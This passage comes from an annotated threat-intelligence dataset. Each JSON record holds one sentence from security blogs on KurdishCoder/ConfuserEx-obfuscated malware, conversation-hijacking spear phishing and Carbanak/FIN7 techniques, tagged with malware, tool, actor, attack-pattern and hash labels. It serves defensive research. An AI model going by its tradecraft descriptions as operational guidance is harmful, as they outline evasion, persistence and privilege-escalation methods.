ConfuserEx.","entities":[{"id":49348,"label":"tools","start_offset":104,"end_offset":114},{"id":49349,"label":"tools","start_offset":158,"end_offset":168},{"id":49347,"label":"malware","start_offset":24,"end_offset":32}],"relations":[],"Comments":[]} {"id":3561,"text":"The following image shows an assembly module property that was generated for this sample.","entities":[],"relations":[],"Comments":[]} {"id":3562,"text":"Figure 2.","entities":[],"relations":[],"Comments":[]} {"id":3563,"text":"The generated assembly module property","entities":[],"relations":[],"Comments":[]} {"id":3564,"text":"The module’s property name is “KurdishCoderProducts”, with a value shown to be “ConfuserEx v1.0.0-custom”.","entities":[],"relations":[],"Comments":[]} {"id":3565,"text":" To understand where this value is coming from, let’s take a look at the open-source ConfuserEx tool to see how the values are created.","entities":[{"id":49350,"label":"tools","start_offset":85,"end_offset":96}],"relations":[],"Comments":[]} {"id":3566,"text":"From there, we can establish a hypothesis as to their source.","entities":[],"relations":[],"Comments":[]} {"id":3567,"text":"A closer look at ConfuserEx’s functions","entities":[{"id":49351,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} {"id":3568,"text":"While ConfuserEx is able to apply multiple transformations to the target binary, we are interested in two particular functions that we can use for correlation: Source code building.","entities":[{"id":49352,"label":"tools","start_offset":6,"end_offset":16}],"relations":[],"Comments":[]} {"id":3569,"text":" ConfuserEx is an open-source tool with multiple versions hosted on Github.","entities":[{"id":49353,"label":"tools","start_offset":1,"end_offset":11}],"relations":[],"Comments":[]} {"id":3570,"text":" By examining one of the community-supported versions, we can see there is a tool to build ConfuserEx from the command line.","entities":[{"id":49354,"label":"tools","start_offset":91,"end_offset":101}],"relations":[],"Comments":[]} {"id":3571,"text":"This build command line has a function to update the final binary versions based on the last Git-tagged version.","entities":[],"relations":[],"Comments":[]} {"id":3572,"text":"However, if ConfuserEx is built outside Git, the version update tool will just generate the value “version-custom” as shown below.","entities":[{"id":49355,"label":"tools","start_offset":12,"end_offset":22},{"id":49356,"label":"tools","start_offset":40,"end_offset":43}],"relations":[],"Comments":[]} {"id":3573,"text":"Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":3574,"text":"Code taken from a ConfuserEx version created outside GIT","entities":[{"id":49358,"label":"tools","start_offset":53,"end_offset":56},{"id":49357,"label":"tools","start_offset":18,"end_offset":28}],"relations":[],"Comments":[]} {"id":3575,"text":"Since the string “ConfuserEx v1.0.0-custom” is present in the module property: [module: KurdishCoderProducts(\"ConfuserEx v1.0.0-custom\")]”, we can surmise that the version of ConfuserEx that was used for CyaX_Sharp was indeed built outside of Git.","entities":[{"id":49359,"label":"tools","start_offset":175,"end_offset":185},{"id":49360,"label":"tools","start_offset":204,"end_offset":214},{"id":49361,"label":"tools","start_offset":243,"end_offset":246}],"relations":[],"Comments":[]} {"id":3576,"text":" 2. Watermarking","entities":[],"relations":[],"Comments":[]} {"id":3577,"text":"When ConfuserEx performs its obfuscation routine, one of the operations creates a watermark – a unique identifier within the software--that is present in the final binary.","entities":[{"id":49362,"label":"tools","start_offset":5,"end_offset":15}],"relations":[],"Comments":[]} {"id":3578,"text":"The watermarking technique is implemented through the module attributes of the assembly.","entities":[],"relations":[],"Comments":[]} {"id":3579,"text":"The following source code screenshot shows how this is implemented.","entities":[],"relations":[],"Comments":[]} {"id":3580,"text":"Figure 4. Code showing how the watermarking is performed via the module attributes of the assembly","entities":[],"relations":[],"Comments":[]} {"id":3581,"text":"From the previous code section, we can see the default attribute added by ConfuserEx is “ConfusedBy”.","entities":[{"id":49363,"label":"tools","start_offset":74,"end_offset":84}],"relations":[],"Comments":[]} {"id":3582,"text":"If we test it using a sample binary, the following is generated: Figure 5. Testing a sample binary using ConfuserEx There are two important aspects to this attribute: first, it is hardcoded as a string constant and second, its value is presented in clear text in the final binary as the following image shows.","entities":[{"id":49364,"label":"tools","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} {"id":3583,"text":" Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3584,"text":"The default attribute shown in clear text in the final binary We now have solid evidence that CyaX_Sharp was obfuscated using a modified version of ConfuserEx.","entities":[{"id":49365,"label":"tools","start_offset":94,"end_offset":104},{"id":49366,"label":"tools","start_offset":148,"end_offset":158}],"relations":[],"Comments":[]} {"id":3585,"text":"Next, let’s look for the attribute indicator, starting with the CyaX assembly used in the NotepadEx attack.","entities":[{"id":49368,"label":"campaign","start_offset":90,"end_offset":99},{"id":49367,"label":"tools","start_offset":64,"end_offset":68}],"relations":[{"id":789,"from_id":49368,"to_id":49367,"type":"uses"}],"Comments":[]} {"id":3586,"text":" Cassandra Protector: CyaX","entities":[{"id":49369,"label":"tools","start_offset":1,"end_offset":10},{"id":49370,"label":"tools","start_offset":22,"end_offset":26}],"relations":[],"Comments":[]} {"id":3587,"text":"After inspection we noticed that this version of CyaX was similarly notable due to two characteristics.","entities":[{"id":49371,"label":"tools","start_offset":49,"end_offset":53}],"relations":[],"Comments":[]} {"id":3588,"text":"First, the debug symbols paths were leaked -- suggesting a possible custom build which can be correlated with another modification applied to CyaX. Figure 7.","entities":[{"id":49372,"label":"tools","start_offset":142,"end_offset":146}],"relations":[],"Comments":[]} {"id":3589,"text":"The leaked debug symbols paths","entities":[],"relations":[],"Comments":[]} {"id":3590,"text":"The second indicator has to do with one of the methods of CyaX which was modified -- specifically the one injecting the binary in memory.","entities":[{"id":49373,"label":"tools","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} {"id":3591,"text":"The following image shows the modified function name.","entities":[],"relations":[],"Comments":[]} {"id":3592,"text":" Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3593,"text":"The modified method which was renamed to Kirkuk, which is also a name of a city in Iraq What other payloads are using KurdishCoder?","entities":[],"relations":[],"Comments":[]} {"id":3594,"text":"Analysis of some of the captured samples reveals the different payloads being used (as shown in the table below).","entities":[],"relations":[],"Comments":[]} {"id":3595,"text":"Note that this does not cover all the samples – it is possible that other payloads are being deployed as well.","entities":[],"relations":[],"Comments":[]} {"id":3596,"text":" Sample Payload KurdishCoderMainSample KurdishCoder_CyaX_Sharp CyaX_method_rename CustomIncreaseX phoenix_keylogger Yes Yes Kirkuk NotePadEx Njrat No Yes Kirkuk QuickTranslation Agent Tesla Yes Yes Kurd SandiwchGenerator Agent Tesla Yes Yes Kirkuk SimpleGame Remcos Yes Yes Kirkuk AnimalGames Hawkeye Rebord Keylogger Yes Yes Kurd Table 1.","entities":[{"id":49374,"label":"malware","start_offset":178,"end_offset":189},{"id":49376,"label":"malware","start_offset":259,"end_offset":265},{"id":49375,"label":"malware","start_offset":221,"end_offset":232},{"id":49377,"label":"malware","start_offset":293,"end_offset":317}],"relations":[],"Comments":[]} {"id":3597,"text":"The different samples organized name, payload delivered and the fully-undetectable stages where the attribute “KurdishCoderProduction” is present","entities":[],"relations":[],"Comments":[]} {"id":3598,"text":"Cassandra Crypter","entities":[{"id":49378,"label":"tools","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} {"id":3599,"text":"We think one of the possible sources of the customized ConfuserEx is the online service Cassandra Crypter, which offers two kinds of subscription plans: The Premium Plan and the Private Stub.","entities":[{"id":49380,"label":"tools","start_offset":88,"end_offset":105},{"id":49379,"label":"tools","start_offset":55,"end_offset":65}],"relations":[],"Comments":[]} {"id":3600,"text":"The Premium Plan requires payment and works automatically, while the Private Stub requires the user to contact the support from the service for further personalization.","entities":[],"relations":[],"Comments":[]} {"id":3601,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} {"id":3602,"text":"Cassandra Crypter’s subscription plans","entities":[{"id":49381,"label":"tools","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} {"id":3603,"text":"The combination of ConfuserEx and CyaX (Cassandra protector) seems to be unique and customized based on the indicators mentioned earlier.","entities":[{"id":49382,"label":"tools","start_offset":19,"end_offset":29},{"id":49383,"label":"tools","start_offset":34,"end_offset":39},{"id":49384,"label":"tools","start_offset":40,"end_offset":59}],"relations":[],"Comments":[]} {"id":3604,"text":" While we don’t have definitive evidence that the use of these tools are part of a single campaign, we think the analyzed samples are related to a specific campaign.","entities":[],"relations":[],"Comments":[]} {"id":3605,"text":"Note that the KurdishCoder indicator was spotted also by the Italian Computer Emergency Response Team - Pubblica Amministrazione (CERT-PA), which they reported as a single incident.","entities":[{"id":49385,"label":"identity","start_offset":61,"end_offset":138}],"relations":[],"Comments":[]} {"id":3606,"text":"As with Capesand, we will be monitoring the use of the tools mentioned in this blog entry for any future developments and updates.","entities":[{"id":49386,"label":"malware","start_offset":8,"end_offset":16}],"relations":[],"Comments":[]} {"id":3607,"text":"Trend Micro Solutions","entities":[{"id":49387,"label":"identity","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":3608,"text":"A proactive, multilayered approach to security is key against a wide range of threats— from the gateway, endpoints, networks, and servers.","entities":[],"relations":[],"Comments":[]} {"id":3609,"text":"Trend Micro™ endpoint security has vulnerability protection that shields endpoints from identified and unknown vulnerability exploits even before patches are even deployed.","entities":[{"id":49388,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3610,"text":"Trend Micro’s endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security protect end users and businesses from these threats by detecting and blocking malicious files and all related malicious URLs.","entities":[{"id":49389,"label":"identity","start_offset":0,"end_offset":11},{"id":49390,"label":"identity","start_offset":41,"end_offset":52}],"relations":[],"Comments":[]} {"id":3611,"text":"Indicators of Compromise (IoCs) Indicator Attribution Trend Micro Pattern Detection 068d32a43191dc0164b600b85a1621be0154504fd477167422ff4a8fb3406d73 AnimalGames Backdoor.","entities":[{"id":10902,"label":"SHA2","start_offset":85,"end_offset":149},{"id":49391,"label":"identity","start_offset":55,"end_offset":66},{"id":49392,"label":"malware","start_offset":150,"end_offset":170}],"relations":[{"id":790,"from_id":10902,"to_id":49392,"type":"indicates"}],"Comments":[]} {"id":3612,"text":"MSIL.BLADABINDI.QBR","entities":[{"id":49393,"label":"malware","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} {"id":3613,"text":"07be156caac1157707ffe38266dc60abadc488226b4f41d67f23eac98dd917b0","entities":[{"id":10903,"label":"SHA2","start_offset":0,"end_offset":64}],"relations":[],"Comments":[]} {"id":3614,"text":"CustomIncreaseX Backdoor.MSIL.BLADABINDI.QBR b00cc9a4292fc5cc4ae5371ea1615ec6e49ebaf061dc4eccde84a6f96d95747c NotePadEx Backdoor.MSIL.BLADABINDI.QBR 6755ce7a362ffecef805e4c54e1d5e201b6c6d561b997ebbd63a8d814ce6a53f QuickTranslation Backdoor.MSIL.BLADABINDI.QBR 8ff11efc1109073fdc49be93e1d100992314fd68ecdff2ba986107602ce75089 SandwichGenerator Backdoor.MSIL.BLADABINDI.QBR 02f2369b58fbb2ba1df2c799b73842880a4874c32c1514a0d8956133be026ade SimpleGame Backdoor.Win32.REMCOS.USMANEAGDZ","entities":[{"id":10904,"label":"SHA2","start_offset":45,"end_offset":109},{"id":10905,"label":"SHA2","start_offset":149,"end_offset":213},{"id":10907,"label":"SHA2","start_offset":372,"end_offset":436},{"id":10906,"label":"SHA2","start_offset":260,"end_offset":324},{"id":49394,"label":"malware","start_offset":16,"end_offset":44},{"id":49395,"label":"malware","start_offset":120,"end_offset":148},{"id":49396,"label":"malware","start_offset":231,"end_offset":259},{"id":49398,"label":"malware","start_offset":448,"end_offset":480},{"id":49397,"label":"malware","start_offset":343,"end_offset":371}],"relations":[],"Comments":[]} {"id":3615,"text":" Tags Mobile | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} {"id":3616,"text":"Spear Phishing is a specific attack technique that has become widely used in the past few years.","entities":[{"id":10910,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":3617,"text":"In our new research blog “FreeMilk: A Highly Targeted Spear Phishing Campaign”, our Unit 42 research team has discovered an attack campaign that takes spear phishing targeting to the next level by hijacking in-progress email conversations.","entities":[{"id":49399,"label":"identity","start_offset":84,"end_offset":105},{"id":49400,"label":"attack-pattern","start_offset":151,"end_offset":165},{"id":49401,"label":"attack-pattern","start_offset":197,"end_offset":238},{"id":49402,"label":"campaign","start_offset":131,"end_offset":139}],"relations":[{"id":791,"from_id":49402,"to_id":49400,"type":"uses"},{"id":792,"from_id":49402,"to_id":49401,"type":"uses"}],"Comments":[]} {"id":3618,"text":"While these are not broad attacks, they represent an escalation in attacker spear phishing techniques in a way that makes it even more important than ever to have a prevention framework in place.","entities":[{"id":49403,"label":"attack-pattern","start_offset":76,"end_offset":90}],"relations":[],"Comments":[]} {"id":3619,"text":" Standard phishing attacks are broad attacks that use general email messages to carry out the attacks.","entities":[{"id":49404,"label":"attack-pattern","start_offset":10,"end_offset":26}],"relations":[],"Comments":[]} {"id":3620,"text":"Standard phishing attacks aren’t personalized: they use very common themes or lures in a generalized way in conjunction with a large enough pool of targets.","entities":[{"id":49405,"label":"attack-pattern","start_offset":9,"end_offset":25}],"relations":[],"Comments":[]} {"id":3621,"text":"The idea is that by chance some percentage of the phishing emails will look legitimate enough to the recipient to be successful.","entities":[{"id":49406,"label":"attack-pattern","start_offset":50,"end_offset":65}],"relations":[],"Comments":[]} {"id":3622,"text":" Basically, standard phishing attacks rely on the law of averages for its success.","entities":[{"id":49407,"label":"attack-pattern","start_offset":21,"end_offset":37}],"relations":[],"Comments":[]} {"id":3623,"text":"As such, it’s a suitable tactic when an attacker cares less about who falls for it than how many fall for it.","entities":[],"relations":[],"Comments":[]} {"id":3624,"text":" A good example of a generalized phishing campaign is the Blank Slate Campaign we wrote about in March 2017.","entities":[{"id":49409,"label":"campaign","start_offset":58,"end_offset":78},{"id":49410,"label":"TIME","start_offset":97,"end_offset":107},{"id":49408,"label":"attack-pattern","start_offset":33,"end_offset":50}],"relations":[{"id":793,"from_id":49409,"to_id":49408,"type":"uses"}],"Comments":[]} {"id":3625,"text":"This attack campaign was so generalized that the attackers didn’t even bother with any theme or lure: they simply sent blank messages with malicious attachments for the recipient to open.","entities":[],"relations":[],"Comments":[]} {"id":3626,"text":" Spear phishing is a more refined and focused version of phishing.","entities":[{"id":10946,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":10948,"label":"attack-pattern","start_offset":57,"end_offset":65}],"relations":[],"Comments":[]} {"id":3627,"text":"Instead of using generalized themes or lures, spear phishing uses themes or lures that are in some way relevant or appropriate for the target recipient.","entities":[{"id":49411,"label":"attack-pattern","start_offset":46,"end_offset":60}],"relations":[],"Comments":[]} {"id":3628,"text":"For example, a spear phishing attack could use email messages about military exercises sent to military or government targets like we saw with our recent research into CMSTAR Trojan attacks.","entities":[{"id":10953,"label":"attack-pattern","start_offset":15,"end_offset":29},{"id":10954,"label":"malware","start_offset":168,"end_offset":174}],"relations":[{"id":794,"from_id":10954,"to_id":10953,"type":"uses"}],"Comments":[]} {"id":3629,"text":"Because the malicious email has a context for the target, he or she is more likely to trust it and open the email message and any attachments.","entities":[],"relations":[],"Comments":[]} {"id":3630,"text":" Spear phishing focuses on the quality of the theme and lure where standard phishing focuses on quantity.","entities":[{"id":49412,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":49413,"label":"attack-pattern","start_offset":76,"end_offset":84}],"relations":[],"Comments":[]} {"id":3631,"text":"Spear phishing is a suitable tactic when an attacker cares about who falls for it.","entities":[{"id":10966,"label":"attack-pattern","start_offset":0,"end_offset":14}],"relations":[],"Comments":[]} {"id":3632,"text":"Where a phishing attack campaign may send malicious emails out to thousands or tens of thousands of targets, a spear phishing campaign my send out just one malicious email to one target.","entities":[{"id":49414,"label":"attack-pattern","start_offset":8,"end_offset":23},{"id":49415,"label":"attack-pattern","start_offset":111,"end_offset":125}],"relations":[],"Comments":[]} {"id":3633,"text":"Sometimes, when that target is a high-value target this attack can also be referred to as ‘Whaling”. In our new research, our Unit 42 research team has found an attack that takes the refining of spear phishing one step further.","entities":[{"id":49418,"label":"identity","start_offset":127,"end_offset":148},{"id":49416,"label":"attack-pattern","start_offset":196,"end_offset":210}],"relations":[],"Comments":[]} {"id":3634,"text":"Rather than simply using a theme or lure that is relevant to the target, the attackers behind these attacks use an email conversation that’s in progress to carry out their attack.","entities":[],"relations":[],"Comments":[]} {"id":3635,"text":" You can see an image of how this works below in Figure 1. Figure 1 Conversation Hijacking to Deliver Malware How this works is that two users, Alice (A) and Bob (B) are carrying on an email conversation.","entities":[],"relations":[],"Comments":[]} {"id":3636,"text":"A shown in the top figure, an attacker, Charlie (C), carries out an attack that enables him to gain complete control of Alice’s email account, most likely through some form of credential theft.","entities":[],"relations":[],"Comments":[]} {"id":3637,"text":"Once Charlie has access to Alice’s email account, he then finds email conversations between Alice and Bob, his ultimate target.","entities":[],"relations":[],"Comments":[]} {"id":3638,"text":"When he finds one that is still in progress, he crafts a malicious attack email that seems to be relevant to the ongoing email conversation and sends it to Bob as shown in the bottom figure.","entities":[],"relations":[],"Comments":[]} {"id":3639,"text":"If Charlie was successful in crafting the attack email to seem legitimate enough, Bob will open the email and any attachments and the attack will succeed. Unlike phishing or even general spear phishing, this is a highly sophisticated, labor intensive, focused attack.","entities":[{"id":49420,"label":"attack-pattern","start_offset":188,"end_offset":202},{"id":49419,"label":"attack-pattern","start_offset":163,"end_offset":171}],"relations":[],"Comments":[]} {"id":3640,"text":"Carrying out a successful conversation hijacking spear phishing attack requires knowing someone that the ultimate target is communicating with, compromising that person’s account, identifying an ongoing email conversation with the ultimate target, crafting an email to appear part of that ongoing email conversation and finally sending it.","entities":[{"id":49421,"label":"attack-pattern","start_offset":49,"end_offset":63}],"relations":[],"Comments":[]} {"id":3641,"text":"Even then there’s no guarantee of success since the target may somehow recognize the attack or have sufficient prevention controls in place to prevent the attack from succeeding.","entities":[],"relations":[],"Comments":[]} {"id":3642,"text":" Given all those points, this isn’t an attack that many of us need to worry about.","entities":[],"relations":[],"Comments":[]} {"id":3643,"text":"But those out there who are in positions that might make them a high value target do need to be concerned about this.","entities":[],"relations":[],"Comments":[]} {"id":3644,"text":"Whether you’re on the board of directors for an organization, a CEO\/CFO\/CSO, entrusted with important military or political information, are a journalist, or an activist\/dissident, this is a kind of attack that you could face.","entities":[],"relations":[],"Comments":[]} {"id":3645,"text":"And like with all targeted attacks, you don’t have to be the ultimate target of the attack campaign to be a target: this is a tactic that can be used as part of a broader attack campaign.","entities":[],"relations":[],"Comments":[]} {"id":3646,"text":"For example, if you are the executive assistant for a CEO, you could be the target of an attack like this (“Bob” in our scenario above) so that you in turn are used to carry out an attack (“Alice” in our scenario above) against your CEO (who then becomes “Bob” in our scenario above). Because of the nature of the attack, unless you verify each and every email you receive, it’s unlikely that you’ll necessarily be able to spot and thwart an attack.","entities":[],"relations":[],"Comments":[]} {"id":3647,"text":"In this case, your best means of protection lies in prevention.","entities":[],"relations":[],"Comments":[]} {"id":3648,"text":"And prevention here is really focused on two things.","entities":[],"relations":[],"Comments":[]} {"id":3649,"text":"First, keeping your systems and devices fully up-to-date with the latest software and security updates.","entities":[],"relations":[],"Comments":[]} {"id":3650,"text":"The specific attack our Unit 42 research team has seen using this technique relied on an attack against a vulnerability in Microsoft Office for which a patch is available.","entities":[{"id":49422,"label":"identity","start_offset":24,"end_offset":45},{"id":49423,"label":"SOFTWARE","start_offset":123,"end_offset":139}],"relations":[],"Comments":[]} {"id":3651,"text":"If an attacker tried to carry this attack out against a target that was patched for this vulnerability, it would fail.","entities":[],"relations":[],"Comments":[]} {"id":3652,"text":" Second, using security on your systems, devices and networks that provides multiple layers of protection can help prevent attacks. Conversation hijacking spear phishing isn’t a threat everyone faces, but for those who do it represents a significant escalation in terms of sophistication and social engineering of spear phishing attacks.","entities":[{"id":49426,"label":"attack-pattern","start_offset":315,"end_offset":329},{"id":49424,"label":"attack-pattern","start_offset":156,"end_offset":170},{"id":49425,"label":"attack-pattern","start_offset":293,"end_offset":311}],"relations":[],"Comments":[]} {"id":3653,"text":"It also takes spear phishing attacks to a level that makes it nearly impossible to distinguish an attack email from a legitimate email.","entities":[{"id":11070,"label":"attack-pattern","start_offset":14,"end_offset":28}],"relations":[],"Comments":[]} {"id":3654,"text":"And so technological prevention controls (patching, robust security) are even more for effective prevention.","entities":[],"relations":[],"Comments":[]} {"id":3655,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":3656,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3657,"text":"Constant monitoring of threat groups is one of the ways that security researchers and law enforcement agencies are able defend systems against cybercrime.","entities":[],"relations":[],"Comments":[]} {"id":3658,"text":"Among these cybercriminals are financially motivated threat groups Carbanak and FIN7.","entities":[{"id":49428,"label":"threat-actor","start_offset":80,"end_offset":84},{"id":49427,"label":"threat-actor","start_offset":67,"end_offset":75}],"relations":[],"Comments":[]} {"id":3659,"text":"Although both names have at times been used to refer to the same group, organizations such as MITRE identifies them as two separate entities that wield the Carbanak backdoor in their attacks.","entities":[{"id":49429,"label":"identity","start_offset":94,"end_offset":99},{"id":49432,"label":"malware","start_offset":156,"end_offset":173}],"relations":[],"Comments":[]} {"id":3660,"text":"However, the groups use not just the Carbanak backdoor but also other types of malware such as Pillowmint, a point-of-sale malware, and Tirion, which is said to be geared to replace Carbanak.","entities":[{"id":49434,"label":"malware","start_offset":136,"end_offset":142},{"id":49431,"label":"malware","start_offset":37,"end_offset":55},{"id":49433,"label":"malware","start_offset":95,"end_offset":105},{"id":49435,"label":"malware","start_offset":182,"end_offset":190}],"relations":[],"Comments":[]} {"id":3661,"text":"MITRE also identifies different main targets for each group: While Carbanak focuses on banking institutions, FIN7 targets food, hospitality, and retail establishments.","entities":[{"id":49437,"label":"threat-actor","start_offset":67,"end_offset":75},{"id":49438,"label":"threat-actor","start_offset":109,"end_offset":113},{"id":49436,"label":"identity","start_offset":0,"end_offset":5},{"id":49439,"label":"identity","start_offset":87,"end_offset":107},{"id":49440,"label":"identity","start_offset":122,"end_offset":166}],"relations":[{"id":795,"from_id":49437,"to_id":49439,"type":"targets"},{"id":796,"from_id":49438,"to_id":49440,"type":"targets"}],"Comments":[]} {"id":3662,"text":"This week, the results of this year's round of the MITRE Engenuity ATT&CK Evaluations were released, which focused on Carbanak+FIN7.","entities":[{"id":49441,"label":"identity","start_offset":51,"end_offset":73},{"id":49442,"label":"threat-actor","start_offset":118,"end_offset":126},{"id":49443,"label":"threat-actor","start_offset":127,"end_offset":131}],"relations":[],"Comments":[]} {"id":3663,"text":"We also separately discussed how Trend Micro solutions deal with these threats.","entities":[{"id":49444,"label":"identity","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} {"id":3664,"text":"For more background on what happens in attacks launched by Carbanak and FIN7, we pieced together information from our studies of these groups as well as information from ATT&CK tactics and techniques (a total of 65 techniques across 11 tactics) identified by MITRE to be related to these threat groups.","entities":[{"id":49446,"label":"threat-actor","start_offset":72,"end_offset":76},{"id":49445,"label":"threat-actor","start_offset":59,"end_offset":67},{"id":49447,"label":"identity","start_offset":259,"end_offset":264}],"relations":[],"Comments":[]} {"id":3665,"text":"What happens in Carbanak and FIN7 attacks?","entities":[{"id":49448,"label":"threat-actor","start_offset":16,"end_offset":24},{"id":49449,"label":"threat-actor","start_offset":29,"end_offset":33}],"relations":[],"Comments":[]} {"id":3666,"text":"In our analysis of a related past campaign, we observed that attackers enter the system through spear phishing.","entities":[{"id":49450,"label":"attack-pattern","start_offset":96,"end_offset":110}],"relations":[],"Comments":[]} {"id":3667,"text":"After gaining a foothold in the system, the dynamic data exchange (DDE) feature in Windows and legitimate cloud-based services will then be abused to deliver the malware or to establish command-and-control (C&C) communication.","entities":[{"id":49451,"label":"SOFTWARE","start_offset":83,"end_offset":90}],"relations":[],"Comments":[]} {"id":3668,"text":"After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic.","entities":[{"id":49452,"label":"malware","start_offset":16,"end_offset":33},{"id":49453,"label":"attack-pattern","start_offset":54,"end_offset":68},{"id":49456,"label":"attack-pattern","start_offset":120,"end_offset":150},{"id":49457,"label":"attack-pattern","start_offset":156,"end_offset":179},{"id":49455,"label":"attack-pattern","start_offset":94,"end_offset":118},{"id":49454,"label":"attack-pattern","start_offset":73,"end_offset":92}],"relations":[{"id":797,"from_id":49452,"to_id":49453,"type":"uses"},{"id":798,"from_id":49452,"to_id":49454,"type":"uses"},{"id":799,"from_id":49452,"to_id":49455,"type":"uses"},{"id":800,"from_id":49452,"to_id":49456,"type":"uses"},{"id":801,"from_id":49452,"to_id":49457,"type":"uses"}],"Comments":[]} {"id":3669,"text":"For lateral movement, the malware abuses remote and system administration tools.","entities":[{"id":49458,"label":"attack-pattern","start_offset":4,"end_offset":20},{"id":49459,"label":"attack-pattern","start_offset":34,"end_offset":79}],"relations":[],"Comments":[]} {"id":3670,"text":"To be more specific in terms of ATT&CK® techniques, Carbanak and FIN7 share a notable number of similarities.","entities":[{"id":49461,"label":"threat-actor","start_offset":65,"end_offset":69},{"id":49460,"label":"threat-actor","start_offset":52,"end_offset":60}],"relations":[{"id":802,"from_id":49460,"to_id":49461,"type":"related-to"}],"Comments":[]} {"id":3671,"text":"However, some techniques are only used by one of them, as we discuss in the subsequent sections.","entities":[],"relations":[],"Comments":[]} {"id":3672,"text":" Figure 1. ATT&CK® tactics shared between Carbanak and FIN7 The following are the tactics and techniques that are employed by Carbanak and FIN7, as shared by MITRE.","entities":[{"id":49464,"label":"threat-actor","start_offset":135,"end_offset":143},{"id":49465,"label":"threat-actor","start_offset":148,"end_offset":152},{"id":49462,"label":"threat-actor","start_offset":46,"end_offset":54},{"id":49463,"label":"threat-actor","start_offset":59,"end_offset":63},{"id":49466,"label":"identity","start_offset":167,"end_offset":172}],"relations":[],"Comments":[]} {"id":3673,"text":"Initial Access","entities":[],"relations":[],"Comments":[]} {"id":3674,"text":"Both groups use spear-phishing campaigns with attachments that are embedded with exploits as an entry point to the target system.","entities":[{"id":49467,"label":"attack-pattern","start_offset":16,"end_offset":40}],"relations":[],"Comments":[]} {"id":3675,"text":"Execution","entities":[],"relations":[],"Comments":[]} {"id":3676,"text":"Successfully entering the system leads to the next step: executing the attack.","entities":[],"relations":[],"Comments":[]} {"id":3677,"text":"For code and behavior execution, both groups use a variety of techniques through native API, PowerShell, service execution, user execution, Windows Component Object Model (COM) and Distributed COM, and Windows Management Instrumentation (WMI).","entities":[{"id":49468,"label":"tools","start_offset":93,"end_offset":103},{"id":49471,"label":"attack-pattern","start_offset":141,"end_offset":242},{"id":49469,"label":"attack-pattern","start_offset":105,"end_offset":122},{"id":49470,"label":"attack-pattern","start_offset":124,"end_offset":138}],"relations":[],"Comments":[]} {"id":3678,"text":"Carbanak also abuses command-line interface and DDE client-server protocol.","entities":[{"id":49472,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} {"id":3679,"text":"On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems.","entities":[{"id":49473,"label":"threat-actor","start_offset":19,"end_offset":23},{"id":49474,"label":"tools","start_offset":43,"end_offset":48},{"id":49475,"label":"attack-pattern","start_offset":110,"end_offset":128}],"relations":[],"Comments":[]} {"id":3680,"text":"Persistence","entities":[],"relations":[],"Comments":[]} {"id":3681,"text":"Once the malicious behavior is executed, the attackers will attempt to keep their presence in a system.","entities":[],"relations":[],"Comments":[]} {"id":3682,"text":"To maintain persistence, the groups create new services.","entities":[],"relations":[],"Comments":[]} {"id":3683,"text":"They also add programs to a startup folder that can be referenced with a registry run key.","entities":[],"relations":[],"Comments":[]} {"id":3684,"text":"We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique.","entities":[{"id":49477,"label":"malware","start_offset":29,"end_offset":45},{"id":49479,"label":"attack-pattern","start_offset":51,"end_offset":107}],"relations":[{"id":803,"from_id":49477,"to_id":49479,"type":"uses"}],"Comments":[]} {"id":3685,"text":"Credentials of existing valid accounts were also abused.","entities":[],"relations":[],"Comments":[]} {"id":3686,"text":"In the case of FIN7, the use of application shimming databases (which can allow developers to apply fixes to applications without rewriting code) and hooking processes that allow the modification of program behaviors are some of the techniques that can be applied.","entities":[{"id":49480,"label":"threat-actor","start_offset":15,"end_offset":19}],"relations":[],"Comments":[]} {"id":3687,"text":"The former has been utilized in a campaign involving the Pillowmint malware.","entities":[{"id":49481,"label":"malware","start_offset":57,"end_offset":75}],"relations":[],"Comments":[]} {"id":3688,"text":"Privilege Escalation","entities":[{"id":11194,"label":"attack-pattern","start_offset":0,"end_offset":20}],"relations":[],"Comments":[]} {"id":3689,"text":"Some functions that are needed for the attack require admin privileges.","entities":[],"relations":[],"Comments":[]} {"id":3690,"text":"To elevate privileges, the groups bypass Windows User Account Control (UAC) mechanisms, new services, and valid accounts to elevate process privileges.","entities":[{"id":49482,"label":"attack-pattern","start_offset":34,"end_offset":75}],"relations":[],"Comments":[]} {"id":3691,"text":"For the same purpose, on Linux systems, Carbanak attacks can use sudo, a program that permits users to execute the programs of a superuser.","entities":[{"id":49483,"label":"threat-actor","start_offset":40,"end_offset":48}],"relations":[],"Comments":[]} {"id":3692,"text":"FIN7 attacks can and inject code into processes and hijack the search order used to load DLL files.","entities":[{"id":49484,"label":"threat-actor","start_offset":0,"end_offset":4},{"id":49485,"label":"attack-pattern","start_offset":21,"end_offset":32},{"id":49486,"label":"attack-pattern","start_offset":52,"end_offset":98}],"relations":[{"id":804,"from_id":49484,"to_id":49485,"type":"uses"},{"id":805,"from_id":49484,"to_id":49486,"type":"uses"}],"Comments":[]} {"id":3693,"text":"Defense Evasion","entities":[],"relations":[],"Comments":[]} {"id":3694,"text":"After a series of malicious behavior, attackers need to 